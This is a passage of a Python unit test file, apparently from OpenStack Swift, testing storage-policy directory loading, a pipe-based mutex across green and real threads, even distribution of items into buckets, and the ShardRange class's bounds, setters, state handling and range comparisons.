os.path.join(self.swift_dir, 'swift.conf') self.policy_name = ''.join(random.sample(string.ascii_letters, 20)) with open(self.swift_conf, "wt") as sc: sc.write(''' [swift-hash] swift_hash_path_suffix = changeme [storage-policy:0] name = default default = yes [storage-policy:1] name = %s ''' % self.policy_name) def tearDown(self): shutil.rmtree(self.swift_dir, ignore_errors=True) def test_set_swift_dir(self): set_swift_dir(None) reload_storage_policies() self.assertIsNone(POLICIES.get_by_name(self.policy_name)) set_swift_dir(self.swift_dir) reload_storage_policies() self.assertIsNotNone(POLICIES.get_by_name(self.policy_name)) class TestPipeMutex(unittest.TestCase): def setUp(self): self.mutex = utils.PipeMutex() def tearDown(self): self.mutex.close() def test_nonblocking(self): evt_lock1 = eventlet.event.Event() evt_lock2 = eventlet.event.Event() evt_unlock = eventlet.event.Event() def get_the_lock(): self.mutex.acquire() evt_lock1.send('got the lock') evt_lock2.wait() self.mutex.release() evt_unlock.send('released the lock') eventlet.spawn(get_the_lock) evt_lock1.wait() # Now, the other greenthread has the lock. self.assertFalse(self.mutex.acquire(blocking=False)) evt_lock2.send('please release the lock') evt_unlock.wait() # The other greenthread has released the lock. self.assertTrue(self.mutex.acquire(blocking=False)) def test_recursive(self): self.assertTrue(self.mutex.acquire(blocking=False)) self.assertTrue(self.mutex.acquire(blocking=False)) def try_acquire_lock(): return self.mutex.acquire(blocking=False) self.assertFalse(eventlet.spawn(try_acquire_lock).wait()) self.mutex.release() self.assertFalse(eventlet.spawn(try_acquire_lock).wait()) self.mutex.release() self.assertTrue(eventlet.spawn(try_acquire_lock).wait()) def test_release_without_acquire(self): self.assertRaises(RuntimeError, self.mutex.release) def test_too_many_releases(self): self.mutex.acquire() self.mutex.release() self.assertRaises(RuntimeError, self.mutex.release) def test_wrong_releaser(self): self.mutex.acquire() with quiet_eventlet_exceptions(): self.assertRaises(RuntimeError, eventlet.spawn(self.mutex.release).wait) def test_blocking(self): evt = eventlet.event.Event() sequence = [] def coro1(): eventlet.sleep(0) # let coro2 go self.mutex.acquire() sequence.append('coro1 acquire') evt.send('go') self.mutex.release() sequence.append('coro1 release') def coro2(): evt.wait() # wait for coro1 to start us self.mutex.acquire() sequence.append('coro2 acquire') self.mutex.release() sequence.append('coro2 release') c1 = eventlet.spawn(coro1) c2 = eventlet.spawn(coro2) c1.wait() c2.wait() self.assertEqual(sequence, [ 'coro1 acquire', 'coro1 release', 'coro2 acquire', 'coro2 release']) def test_blocking_tpool(self): # Note: this test's success isn't a guarantee that the mutex is # working. However, this test's failure means that the mutex is # definitely broken. sequence = [] def do_stuff(): n = 10 while n > 0: self.mutex.acquire() sequence.append("<") eventlet.sleep(0.0001) sequence.append(">") self.mutex.release() n -= 1 greenthread1 = eventlet.spawn(do_stuff) greenthread2 = eventlet.spawn(do_stuff) real_thread1 = eventlet.patcher.original('threading').Thread( target=do_stuff) real_thread1.start() real_thread2 = eventlet.patcher.original('threading').Thread( target=do_stuff) real_thread2.start() greenthread1.wait() greenthread2.wait() real_thread1.join() real_thread2.join() self.assertEqual(''.join(sequence), "<>" * 40) def test_blocking_preserves_ownership(self): pthread1_event = eventlet.patcher.original('threading').Event() pthread2_event1 = eventlet.patcher.original('threading').Event() pthread2_event2 = eventlet.patcher.original('threading').Event() thread_id = [] owner = [] def pthread1(): thread_id.append(id(eventlet.greenthread.getcurrent())) self.mutex.acquire() owner.append(self.mutex.owner) pthread2_event1.set() orig_os_write = utils.os.write def patched_os_write(*a, **kw): try: return orig_os_write(*a, **kw) finally: pthread1_event.wait() with mock.patch.object(utils.os, 'write', patched_os_write): self.mutex.release() pthread2_event2.set() def pthread2(): pthread2_event1.wait() # ensure pthread1 acquires lock first thread_id.append(id(eventlet.greenthread.getcurrent())) self.mutex.acquire() pthread1_event.set() pthread2_event2.wait() owner.append(self.mutex.owner) self.mutex.release() real_thread1 = eventlet.patcher.original('threading').Thread( target=pthread1) real_thread1.start() real_thread2 = eventlet.patcher.original('threading').Thread( target=pthread2) real_thread2.start() real_thread1.join() real_thread2.join() self.assertEqual(thread_id, owner) self.assertIsNone(self.mutex.owner) @classmethod def tearDownClass(cls): # PipeMutex turns this off when you instantiate one eventlet.debug.hub_prevent_multiple_readers(True) class TestDistributeEvenly(unittest.TestCase): def test_evenly_divided(self): out = utils.distribute_evenly(range(12), 3) self.assertEqual(out, [ [0, 3, 6, 9], [1, 4, 7, 10], [2, 5, 8, 11], ]) out = utils.distribute_evenly(range(12), 4) self.assertEqual(out, [ [0, 4, 8], [1, 5, 9], [2, 6, 10], [3, 7, 11], ]) def test_uneven(self): out = utils.distribute_evenly(range(11), 3) self.assertEqual(out, [ [0, 3, 6, 9], [1, 4, 7, 10], [2, 5, 8], ]) def test_just_one(self): out = utils.distribute_evenly(range(5), 1) self.assertEqual(out, [[0, 1, 2, 3, 4]]) def test_more_buckets_than_items(self): out = utils.distribute_evenly(range(5), 7) self.assertEqual(out, [[0], [1], [2], [3], [4], [], []]) class TestShardRange(unittest.TestCase): def setUp(self): self.ts_iter = make_timestamp_iter() def test_min_max_bounds(self): # max self.assertEqual(utils.ShardRange.MAX, utils.ShardRange.MAX) self.assertFalse(utils.ShardRange.MAX > utils.ShardRange.MAX) self.assertFalse(utils.ShardRange.MAX < utils.ShardRange.MAX) for val in 'z', u'\u00e4': self.assertFalse(utils.ShardRange.MAX == val) self.assertFalse(val > utils.ShardRange.MAX) self.assertTrue(val < utils.ShardRange.MAX) self.assertTrue(utils.ShardRange.MAX > val) self.assertFalse(utils.ShardRange.MAX < val) self.assertEqual('', str(utils.ShardRange.MAX)) self.assertFalse(utils.ShardRange.MAX) self.assertTrue(utils.ShardRange.MAX == utils.ShardRange.MAX) self.assertFalse(utils.ShardRange.MAX != utils.ShardRange.MAX) self.assertTrue( utils.ShardRange.MaxBound() == utils.ShardRange.MaxBound()) self.assertFalse( utils.ShardRange.MaxBound() != utils.ShardRange.MaxBound()) # min self.assertEqual(utils.ShardRange.MIN, utils.ShardRange.MIN) self.assertFalse(utils.ShardRange.MIN > utils.ShardRange.MIN) self.assertFalse(utils.ShardRange.MIN < utils.ShardRange.MIN) for val in 'z', u'\u00e4': self.assertFalse(utils.ShardRange.MIN == val) self.assertFalse(val < utils.ShardRange.MIN) self.assertTrue(val > utils.ShardRange.MIN) self.assertTrue(utils.ShardRange.MIN < val) self.assertFalse(utils.ShardRange.MIN > val) self.assertFalse(utils.ShardRange.MIN) self.assertEqual('', str(utils.ShardRange.MIN)) self.assertFalse(utils.ShardRange.MIN) self.assertTrue(utils.ShardRange.MIN == utils.ShardRange.MIN) self.assertFalse(utils.ShardRange.MIN != utils.ShardRange.MIN) self.assertTrue( utils.ShardRange.MinBound() == utils.ShardRange.MinBound()) self.assertFalse( utils.ShardRange.MinBound() != utils.ShardRange.MinBound()) self.assertFalse(utils.ShardRange.MAX == utils.ShardRange.MIN) self.assertFalse(utils.ShardRange.MIN == utils.ShardRange.MAX) self.assertTrue(utils.ShardRange.MAX != utils.ShardRange.MIN) self.assertTrue(utils.ShardRange.MIN != utils.ShardRange.MAX) self.assertEqual(utils.ShardRange.MAX, max(utils.ShardRange.MIN, utils.ShardRange.MAX)) self.assertEqual(utils.ShardRange.MIN, min(utils.ShardRange.MIN, utils.ShardRange.MAX)) def test_shard_range_initialisation(self): def assert_initialisation_ok(params, expected): pr = utils.ShardRange(**params) self.assertDictEqual(dict(pr), expected) def assert_initialisation_fails(params, err_type=ValueError): with self.assertRaises(err_type): utils.ShardRange(**params) ts_1 = next(self.ts_iter) ts_2 = next(self.ts_iter) ts_3 = next(self.ts_iter) ts_4 = next(self.ts_iter) empty_run = dict(name=None, timestamp=None, lower=None, upper=None, object_count=0, bytes_used=0, meta_timestamp=None, deleted=0, state=utils.ShardRange.FOUND, state_timestamp=None, epoch=None) # name, timestamp must be given assert_initialisation_fails(empty_run.copy()) assert_initialisation_fails(dict(empty_run, name='a/c'), TypeError) assert_initialisation_fails(dict(empty_run, timestamp=ts_1)) # name must be form a/c assert_initialisation_fails(dict(empty_run, name='c', timestamp=ts_1)) assert_initialisation_fails(dict(empty_run, name='', timestamp=ts_1)) assert_initialisation_fails(dict(empty_run, name='/a/c', timestamp=ts_1)) assert_initialisation_fails(dict(empty_run, name='/c', timestamp=ts_1)) # lower, upper can be None expect = dict(name='a/c', timestamp=ts_1.internal, lower='', upper='', object_count=0, bytes_used=0, meta_timestamp=ts_1.internal, deleted=0, state=utils.ShardRange.FOUND, state_timestamp=ts_1.internal, epoch=None) assert_initialisation_ok(dict(empty_run, name='a/c', timestamp=ts_1), expect) assert_initialisation_ok(dict(name='a/c', timestamp=ts_1), expect) good_run = dict(name='a/c', timestamp=ts_1, lower='l', upper='u', object_count=2, bytes_used=10, meta_timestamp=ts_2, deleted=0, state=utils.ShardRange.CREATED, state_timestamp=ts_3.internal, epoch=ts_4) expect.update({'lower': 'l', 'upper': 'u', 'object_count': 2, 'bytes_used': 10, 'meta_timestamp': ts_2.internal, 'state': utils.ShardRange.CREATED, 'state_timestamp': ts_3.internal, 'epoch': ts_4}) assert_initialisation_ok(good_run.copy(), expect) # obj count and bytes used as int strings good_str_run = good_run.copy() good_str_run.update({'object_count': '2', 'bytes_used': '10'}) assert_initialisation_ok(good_str_run, expect) good_no_meta = good_run.copy() good_no_meta.pop('meta_timestamp') assert_initialisation_ok(good_no_meta, dict(expect, meta_timestamp=ts_1.internal)) good_deleted = good_run.copy() good_deleted['deleted'] = 1 assert_initialisation_ok(good_deleted, dict(expect, deleted=1)) assert_initialisation_fails(dict(good_run, timestamp='water balloon')) assert_initialisation_fails( dict(good_run, meta_timestamp='water balloon')) assert_initialisation_fails(dict(good_run, lower='water balloon')) assert_initialisation_fails(dict(good_run, upper='balloon')) assert_initialisation_fails( dict(good_run, object_count='water balloon')) assert_initialisation_fails(dict(good_run, bytes_used='water ballon')) assert_initialisation_fails(dict(good_run, object_count=-1)) assert_initialisation_fails(dict(good_run, bytes_used=-1)) assert_initialisation_fails(dict(good_run, state=-1)) assert_initialisation_fails(dict(good_run, state_timestamp='not a ts')) assert_initialisation_fails(dict(good_run, name='/a/c')) assert_initialisation_fails(dict(good_run, name='/a/c/')) assert_initialisation_fails(dict(good_run, name='a/c/')) assert_initialisation_fails(dict(good_run, name='a')) assert_initialisation_fails(dict(good_run, name='')) def _check_to_from_dict(self, lower, upper): ts_1 = next(self.ts_iter) ts_2 = next(self.ts_iter) ts_3 = next(self.ts_iter) ts_4 = next(self.ts_iter) sr = utils.ShardRange('a/test', ts_1, lower, upper, 10, 100, ts_2, state=None, state_timestamp=ts_3, epoch=ts_4) sr_dict = dict(sr) expected = { 'name': 'a/test', 'timestamp': ts_1.internal, 'lower': lower, 'upper': upper, 'object_count': 10, 'bytes_used': 100, 'meta_timestamp': ts_2.internal, 'deleted': 0, 'state': utils.ShardRange.FOUND, 'state_timestamp': ts_3.internal, 'epoch': ts_4} self.assertEqual(expected, sr_dict) self.assertIsInstance(sr_dict['lower'], six.string_types) self.assertIsInstance(sr_dict['upper'], six.string_types) sr_new = utils.ShardRange.from_dict(sr_dict) self.assertEqual(sr, sr_new) self.assertEqual(sr_dict, dict(sr_new)) sr_new = utils.ShardRange(**sr_dict) self.assertEqual(sr, sr_new) self.assertEqual(sr_dict, dict(sr_new)) for key in sr_dict: bad_dict = dict(sr_dict) bad_dict.pop(key) with self.assertRaises(KeyError): utils.ShardRange.from_dict(bad_dict) # But __init__ still (generally) works! if key not in ('name', 'timestamp'): utils.ShardRange(**bad_dict) else: with self.assertRaises(TypeError): utils.ShardRange(**bad_dict) def test_to_from_dict(self): self._check_to_from_dict('l', 'u') self._check_to_from_dict('', '') def test_timestamp_setter(self): ts_1 = next(self.ts_iter) sr = utils.ShardRange('a/test', ts_1, 'l', 'u', 0, 0, None) self.assertEqual(ts_1, sr.timestamp) ts_2 = next(self.ts_iter) sr.timestamp = ts_2 self.assertEqual(ts_2, sr.timestamp) sr.timestamp = 0 self.assertEqual(utils.Timestamp(0), sr.timestamp) with self.assertRaises(TypeError): sr.timestamp = None def test_meta_timestamp_setter(self): ts_1 = next(self.ts_iter) sr = utils.ShardRange('a/test', ts_1, 'l', 'u', 0, 0, None) self.assertEqual(ts_1, sr.timestamp) self.assertEqual(ts_1, sr.meta_timestamp) ts_2 = next(self.ts_iter) sr.meta_timestamp = ts_2 self.assertEqual(ts_1, sr.timestamp) self.assertEqual(ts_2, sr.meta_timestamp) ts_3 = next(self.ts_iter) sr.timestamp = ts_3 self.assertEqual(ts_3, sr.timestamp) self.assertEqual(ts_2, sr.meta_timestamp) # meta_timestamp defaults to tracking timestamp sr.meta_timestamp = None self.assertEqual(ts_3, sr.timestamp) self.assertEqual(ts_3, sr.meta_timestamp) ts_4 = next(self.ts_iter) sr.timestamp = ts_4 self.assertEqual(ts_4, sr.timestamp) self.assertEqual(ts_4, sr.meta_timestamp) sr.meta_timestamp = 0 self.assertEqual(ts_4, sr.timestamp) self.assertEqual(utils.Timestamp(0), sr.meta_timestamp) def test_update_meta(self): ts_1 = next(self.ts_iter) sr = utils.ShardRange('a/test', ts_1, 'l', 'u', 0, 0, None) with mock_timestamp_now(next(self.ts_iter)) as now: sr.update_meta(9, 99) self.assertEqual(9, sr.object_count) self.assertEqual(99, sr.bytes_used) self.assertEqual(now, sr.meta_timestamp) with mock_timestamp_now(next(self.ts_iter)) as now: sr.update_meta(99, 999, None) self.assertEqual(99, sr.object_count) self.assertEqual(999, sr.bytes_used) self.assertEqual(now, sr.meta_timestamp) ts_2 = next(self.ts_iter) sr.update_meta(21, 2112, ts_2) self.assertEqual(21, sr.object_count) self.assertEqual(2112, sr.bytes_used) self.assertEqual(ts_2, sr.meta_timestamp) sr.update_meta('11', '12') self.assertEqual(11, sr.object_count) self.assertEqual(12, sr.bytes_used) def check_bad_args(*args): with self.assertRaises(ValueError): sr.update_meta(*args) check_bad_args('bad', 10) check_bad_args(10, 'bad') check_bad_args(10, 11, 'bad') def test_increment_meta(self): ts_1 = next(self.ts_iter) sr = utils.ShardRange('a/test', ts_1, 'l', 'u', 1, 2, None) with mock_timestamp_now(next(self.ts_iter)) as now: sr.increment_meta(9, 99) self.assertEqual(10, sr.object_count) self.assertEqual(101, sr.bytes_used) self.assertEqual(now, sr.meta_timestamp) sr.increment_meta('11', '12') self.assertEqual(21, sr.object_count) self.assertEqual(113, sr.bytes_used) def check_bad_args(*args): with self.assertRaises(ValueError): sr.increment_meta(*args) check_bad_args('bad', 10) check_bad_args(10, 'bad') def test_state_timestamp_setter(self): ts_1 = next(self.ts_iter) sr = utils.ShardRange('a/test', ts_1, 'l', 'u', 0, 0, None) self.assertEqual(ts_1, sr.timestamp) self.assertEqual(ts_1, sr.state_timestamp) ts_2 = next(self.ts_iter) sr.state_timestamp = ts_2 self.assertEqual(ts_1, sr.timestamp) self.assertEqual(ts_2, sr.state_timestamp) ts_3 = next(self.ts_iter) sr.timestamp = ts_3 self.assertEqual(ts_3, sr.timestamp) self.assertEqual(ts_2, sr.state_timestamp) # state_timestamp defaults to tracking timestamp sr.state_timestamp = None self.assertEqual(ts_3, sr.timestamp) self.assertEqual(ts_3, sr.state_timestamp) ts_4 = next(self.ts_iter) sr.timestamp = ts_4 self.assertEqual(ts_4, sr.timestamp) self.assertEqual(ts_4, sr.state_timestamp) sr.state_timestamp = 0 self.assertEqual(ts_4, sr.timestamp) self.assertEqual(utils.Timestamp(0), sr.state_timestamp) def test_state_setter(self): for state in utils.ShardRange.STATES: for test_value in (state, str(state)): sr = utils.ShardRange('a/test', next(self.ts_iter), 'l', 'u') sr.state = test_value actual = sr.state self.assertEqual( state, actual, 'Expected %s but got %s for %s' % (state, actual, test_value) ) for bad_state in (max(utils.ShardRange.STATES) + 1, -1, 99, None, 'stringy', 1.1): sr = utils.ShardRange('a/test', next(self.ts_iter), 'l', 'u') with self.assertRaises(ValueError) as cm: sr.state = bad_state self.assertIn('Invalid state', str(cm.exception)) def test_update_state(self): sr = utils.ShardRange('a/c', next(self.ts_iter)) old_sr = sr.copy() self.assertEqual(utils.ShardRange.FOUND, sr.state) self.assertEqual(dict(sr), dict(old_sr)) # sanity check for state in utils.ShardRange.STATES: if state == utils.ShardRange.FOUND: continue self.assertTrue(sr.update_state(state)) self.assertEqual(dict(old_sr, state=state), dict(sr)) self.assertFalse(sr.update_state(state)) self.assertEqual(dict(old_sr, state=state), dict(sr)) sr = utils.ShardRange('a/c', next(self.ts_iter)) old_sr = sr.copy() for state in utils.ShardRange.STATES: ts = next(self.ts_iter) self.assertTrue(sr.update_state(state, state_timestamp=ts)) self.assertEqual(dict(old_sr, state=state, state_timestamp=ts), dict(sr)) def test_resolve_state(self): for name, number in utils.ShardRange.STATES_BY_NAME.items(): self.assertEqual( (number, name), utils.ShardRange.resolve_state(name)) self.assertEqual( (number, name), utils.ShardRange.resolve_state(name.upper())) self.assertEqual( (number, name), utils.ShardRange.resolve_state(name.title())) self.assertEqual( (number, name), utils.ShardRange.resolve_state(number)) def check_bad_value(value): with self.assertRaises(ValueError) as cm: utils.ShardRange.resolve_state(value) self.assertIn('Invalid state %r' % value, str(cm.exception)) check_bad_value(min(utils.ShardRange.STATES) - 1) check_bad_value(max(utils.ShardRange.STATES) + 1) check_bad_value('badstate') def test_epoch_setter(self): sr = utils.ShardRange('a/c', next(self.ts_iter)) self.assertIsNone(sr.epoch) ts = next(self.ts_iter) sr.epoch = ts self.assertEqual(ts, sr.epoch) ts = next(self.ts_iter) sr.epoch = ts.internal self.assertEqual(ts, sr.epoch) sr.epoch = None self.assertIsNone(sr.epoch) with self.assertRaises(ValueError): sr.epoch = 'bad' def test_deleted_setter(self): sr = utils.ShardRange('a/c', next(self.ts_iter)) for val in (True, 1): sr.deleted = val self.assertIs(True, sr.deleted) for val in (False, 0, None): sr.deleted = val self.assertIs(False, sr.deleted) def test_set_deleted(self): sr = utils.ShardRange('a/c', next(self.ts_iter)) # initialise other timestamps sr.update_state(utils.ShardRange.ACTIVE, state_timestamp=utils.Timestamp.now()) sr.update_meta(1, 2) old_sr = sr.copy() self.assertIs(False, sr.deleted) # sanity check self.assertEqual(dict(sr), dict(old_sr)) # sanity check with mock_timestamp_now(next(self.ts_iter)) as now: self.assertTrue(sr.set_deleted()) self.assertEqual(now, sr.timestamp) self.assertIs(True, sr.deleted) old_sr_dict = dict(old_sr) old_sr_dict.pop('deleted') old_sr_dict.pop('timestamp') sr_dict = dict(sr) sr_dict.pop('deleted') sr_dict.pop('timestamp') self.assertEqual(old_sr_dict, sr_dict) # no change self.assertFalse(sr.set_deleted()) self.assertEqual(now, sr.timestamp) self.assertIs(True, sr.deleted) # force timestamp change with mock_timestamp_now(next(self.ts_iter)) as now: self.assertTrue(sr.set_deleted(timestamp=now)) self.assertEqual(now, sr.timestamp) self.assertIs(True, sr.deleted) def test_lower_setter(self): sr = utils.ShardRange('a/c', utils.Timestamp.now(), 'b', '') # sanity checks self.assertEqual('b', sr.lower_str) self.assertEqual(sr.MAX, sr.upper) def do_test(good_value, expected): sr.lower = good_value self.assertEqual(expected, sr.lower) self.assertEqual(sr.MAX, sr.upper) do_test(utils.ShardRange.MIN, utils.ShardRange.MIN) do_test(utils.ShardRange.MAX, utils.ShardRange.MAX) do_test(b'', utils.ShardRange.MIN) do_test(u'', utils.ShardRange.MIN) do_test(None, utils.ShardRange.MIN) do_test(b'a', 'a') do_test(b'y', 'y') do_test(u'a', 'a') do_test(u'y', 'y') expected = u'\N{SNOWMAN}' if six.PY2: expected = expected.encode('utf-8') do_test(u'\N{SNOWMAN}', expected) do_test(u'\N{SNOWMAN}'.encode('utf-8'), expected) sr = utils.ShardRange('a/c', utils.Timestamp.now(), 'b', 'y') sr.lower = '' self.assertEqual(sr.MIN, sr.lower) sr = utils.ShardRange('a/c', utils.Timestamp.now(), 'b', 'y') with self.assertRaises(ValueError) as cm: sr.lower = 'z' self.assertIn("must be less than or equal to upper", str(cm.exception)) self.assertEqual('b', sr.lower_str) self.assertEqual('y', sr.upper_str) def do_test(bad_value): with self.assertRaises(TypeError) as cm: sr.lower = bad_value self.assertIn("lower must be a string", str(cm.exception)) self.assertEqual('b', sr.lower_str) self.assertEqual('y', sr.upper_str) do_test(1) do_test(1.234) def test_upper_setter(self): sr = utils.ShardRange('a/c', utils.Timestamp.now(), '', 'y') # sanity checks self.assertEqual(sr.MIN, sr.lower) self.assertEqual('y', sr.upper_str) def do_test(good_value, expected): sr.upper = good_value self.assertEqual(expected, sr.upper) self.assertEqual(sr.MIN, sr.lower) do_test(utils.ShardRange.MIN, utils.ShardRange.MIN) do_test(utils.ShardRange.MAX, utils.ShardRange.MAX) do_test(b'', utils.ShardRange.MAX) do_test(u'', utils.ShardRange.MAX) do_test(None, utils.ShardRange.MAX) do_test(b'z', 'z') do_test(b'b', 'b') do_test(u'z', 'z') do_test(u'b', 'b') expected = u'\N{SNOWMAN}' if six.PY2: expected = expected.encode('utf-8') do_test(u'\N{SNOWMAN}', expected) do_test(u'\N{SNOWMAN}'.encode('utf-8'), expected) sr = utils.ShardRange('a/c', utils.Timestamp.now(), 'b', 'y') sr.upper = '' self.assertEqual(sr.MAX, sr.upper) sr = utils.ShardRange('a/c', utils.Timestamp.now(), 'b', 'y') with self.assertRaises(ValueError) as cm: sr.upper = 'a' self.assertIn( "must be greater than or equal to lower", str(cm.exception)) self.assertEqual('b', sr.lower_str) self.assertEqual('y', sr.upper_str) def do_test(bad_value): with self.assertRaises(TypeError) as cm: sr.upper = bad_value self.assertIn("upper must be a string", str(cm.exception)) self.assertEqual('b', sr.lower_str) self.assertEqual('y', sr.upper_str) do_test(1) do_test(1.234) def test_end_marker(self): sr = utils.ShardRange('a/c', utils.Timestamp.now(), '', 'y') self.assertEqual('y\x00', sr.end_marker) sr = utils.ShardRange('a/c', utils.Timestamp.now(), '', '') self.assertEqual('', sr.end_marker) def test_bounds_serialization(self): sr = utils.ShardRange('a/c', utils.Timestamp.now()) self.assertEqual('a/c', sr.name) self.assertEqual(utils.ShardRange.MIN, sr.lower) self.assertEqual('', sr.lower_str) self.assertEqual(utils.ShardRange.MAX, sr.upper) self.assertEqual('', sr.upper_str) self.assertEqual('', sr.end_marker) lower = u'\u00e4' upper = u'\u00fb' sr = utils.ShardRange('a/%s-%s' % (lower, upper), utils.Timestamp.now(), lower, upper) exp_lower = lower exp_upper = upper if six.PY2: exp_lower = exp_lower.encode('utf-8') exp_upper = exp_upper.encode('utf-8') self.assertEqual(exp_lower, sr.lower) self.assertEqual(exp_lower, sr.lower_str) self.assertEqual(exp_upper, sr.upper) self.assertEqual(exp_upper, sr.upper_str) self.assertEqual(exp_upper + '\x00', sr.end_marker) def test_entire_namespace(self): # test entire range (no boundaries) entire = utils.ShardRange('a/test', utils.Timestamp.now()) self.assertEqual(utils.ShardRange.MAX, entire.upper) self.assertEqual(utils.ShardRange.MIN, entire.lower) self.assertIs(True, entire.entire_namespace()) for x in range(100): self.assertTrue(str(x) in entire) self.assertTrue(chr(x) in entire) for x in ('a', 'z', 'zzzz', '124fsdf', u'\u00e4'): self.assertTrue(x in entire, '%r should be in %r' % (x, entire)) entire.lower = 'a' self.assertIs(False, entire.entire_namespace()) def test_comparisons(self): ts = utils.Timestamp.now().internal # upper (if provided) *must* be greater than lower with self.assertRaises(ValueError): utils.ShardRange('f-a', ts, 'f', 'a') # test basic boundaries btoc = utils.ShardRange('a/b-c', ts, 'b', 'c') atof = utils.ShardRange('a/a-f', ts, 'a', 'f') ftol = utils.ShardRange('a/f-l', ts, 'f', 'l') ltor = utils.ShardRange('a/l-r', ts, 'l', 'r') rtoz = utils.ShardRange('a/r-z', ts, 'r', 'z') lower = utils.ShardRange('a/lower', ts, '', 'mid') upper = utils.ShardRange('a/upper', ts, 'mid', '') entire = utils.ShardRange('a/test', utils.Timestamp.now()) # overlapping ranges dtof = utils.ShardRange('a/d-f', ts, 'd', 'f') dtom = utils.ShardRange('a/d-m', ts, 'd', 'm') # test range > and < # non-adjacent self.assertFalse(rtoz < atof) self.assertTrue(atof < ltor) self.assertTrue(ltor > atof) self.assertFalse(ftol > rtoz) # adjacent self.assertFalse(rtoz < ltor) self.assertTrue(ltor < rtoz) self.assertFalse(ltor > rtoz) self.assertTrue(rtoz > ltor) # wholly within self.assertFalse(btoc < atof) self.assertFalse(btoc > atof) self.assertFalse(atof < btoc) self.assertFalse(atof > btoc) self.assertFalse(atof < dtof) self.assertFalse(dtof > atof) self.assertFalse(atof > dtof) self.assertFalse(dtof < atof) self.assertFalse(dtof < dtom) self.assertFalse(dtof > dtom) self.assertFalse(dtom > dtof) self.assertFalse(dtom < dtof) # overlaps self.assertFalse(atof < dtom) self.assertFalse(atof > dtom) self.assertFalse(ltor > dtom) # ranges including min/max bounds self.assertTrue(upper > lower) self.assertTrue(lower < upper) self.assertFalse(upper < lower) self.assertFalse(lower > upper) self.assertFalse(lower < entire) self.assertFalse(entire > lower) self.assertFalse(lower > entire) self.assertFalse(entire < lower) self.assertFalse(upper < entire) self.assertFalse(entire > upper) self.assertFalse(upper > entire) self.assertFalse(entire < upper) self.assertFalse(entire < entire) self.assertFalse(entire > entire) # test range < and > to an item # range is > lower and <= upper to lower boundary isn't # actually included self.assertTrue(ftol > 'f') self.assertFalse(atof < 'f') self.assertTrue(ltor < 'y') self.assertFalse(ftol < 'f') self.assertFalse(atof > 'f') self.assertFalse(ltor > 'y') self.assertTrue('f' < ftol) self.assertFalse('f' > atof) self.assertTrue('y' > ltor) self.assertFalse('f' > ftol) self.assertFalse('f' < atof) self.assertFalse('y' < ltor) # Now test ranges with only 1 boundary start_to_l = utils.ShardRange('a/None-l', ts, '', 'l') l_to_end = utils.ShardRange('a/l-None', ts, 'l', '') for x in ('l', 'm', 'z', 'zzz1231sd'): if x == 'l': self.assertFalse(x in l_to_end) self.assertFalse(start_to_l < x) self.assertFalse(x > start_to_l) else: self.assertTrue(x in l_to_end) self.assertTrue(start_to_l < x) self.assertTrue(x > start_to_l) # Now test some of the range to range checks with missing boundaries self.assertFalse(atof < start_to_l) self.assertFalse(start_to_l < entire) # Now test ShardRange.overlaps(other) self.assertTrue(atof.overlaps(atof)) self.assertFalse(atof.overlaps(ftol)) self.assertFalse(ftol.overlaps(atof)) self.assertTrue(atof.overlaps(dtof)) self.assertTrue(dtof.overlaps(atof)) self.assertFalse(dtof.overlaps(ftol)) self.assertTrue(dtom.overlaps(ftol)) self.assertTrue(ftol.overlaps(dtom)) self.assertFalse(start_to_l.overlaps(l_to_end)) def test_contains(self): ts = utils.Timestamp.now().internal lower = utils.ShardRange('a/-h', ts, '', 'h') mid = utils.ShardRange('a/h-p', ts, 'h', 'p') upper = utils.ShardRange('a/p-', ts, 'p', '') entire = utils.ShardRange('a/all', ts, '', '') self.assertTrue('a' in entire) self.assertTrue('x' in entire) # the empty string is not a valid object name, so it cannot be in any # range self.assertFalse('' in lower) self.assertFalse('' in upper) self.assertFalse('' in entire) self.assertTrue('a' in lower) self.assertTrue('h' in lower) self.assertFalse('i' in lower) self.assertFalse('h' in mid) self.assertTrue('p' in mid) self.assertFalse('p' in upper) self.assertTrue('x' in upper) self.assertIn(utils.ShardRange.MAX, entire) self.assertNotIn(utils.ShardRange.MAX, lower) self.assertIn(utils.ShardRange.MAX, upper) # lower bound is excluded so MIN cannot be in any range. self.assertNotIn(utils.ShardRange.MIN, entire) self.assertNotIn(utils.ShardRange.MIN, upper) self.assertNotIn(utils.ShardRange.MIN, lower) def test_includes(self): ts = utils.Timestamp.now().internal _to_h = utils.ShardRange('a/-h', ts, '', 'h') d_to_t = utils.ShardRange('a/d-t', ts, 'd', 't') d_to_k = utils.ShardRange('a/d-k', ts, 'd', 'k') e_to_l = utils.ShardRange('a/e-l', ts, 'e', 'l') k_to_t = utils.ShardRange('a/k-t', ts, 'k', 't') p_to_ = utils.ShardRange('a/p-', ts, 'p', '') t_to_ = utils.ShardRange('a/t-', ts, 't', '') entire = utils.ShardRange('a/all', ts, '', '') self.assertTrue(entire.includes(entire)) self.assertTrue(d_to_t.includes(d_to_t)) self.assertTrue(_to_h.includes(_to_h)) self.assertTrue(p_to_.includes(p_to_)) self.assertTrue(entire.includes(_to_h)) self.assertTrue(entire.includes(d_to_t)) self.assertTrue(entire.includes(p_to_)) self.assertTrue(d_to_t.includes(d_to_k)) self.assertTrue(d_to_t.includes(e_to_l)) self.assertTrue(d_to_t.includes(k_to_t)) self.assertTrue(p_to_.includes(t_to_)) self.assertFalse(_to_h.includes(d_to_t)) self.assertFalse(p_to_.includes(d_to_t)) self.assertFalse(k_to_t.includes(d_to_k)) self.assertFalse(d_to_k.includes(e_to_l)) self.assertFalse(k_to_t.includes(e_to_l)) self.assertFalse(t_to_.includes(p_to_)) self.assertFalse(_to_h.includes(entire)) self.assertFalse(p_to_.includes(entire)) self.assertFalse(d_to_t.includes(entire)) def test_repr(self): ts = next(self.ts_iter) ts.offset = 1234 meta_ts = next(self.ts_iter) state_ts = next(self.ts_iter) sr = utils.ShardRange('a/c', ts, 'l', 'u', 100, 1000, meta_timestamp=meta_ts, state=utils.ShardRange.ACTIVE, state_timestamp=state_ts) self.assertEqual( "ShardRange<%r to %r as of %s, (100, 1000) as of %s, " "active as of %s>" % ('l', 'u', ts.internal, meta_ts.internal, state_ts.internal), str(sr)) ts.offset = 0 meta_ts.offset = 2 state_ts.offset = 3 sr = utils.ShardRange('a/c', ts, '', '', 100, 1000, meta_timestamp=meta_ts, state=utils.ShardRange.FOUND, state_timestamp=state_ts) self.assertEqual( "ShardRange<MinBound to MaxBound as of %s, (100, 1000) as of %s, " "found as of %s>" % (ts.internal, meta_ts.internal, state_ts.internal), str(sr)) def test_copy(self): sr = utils.ShardRange('a/c', next(self.ts_iter), 'x', 'y', 99, 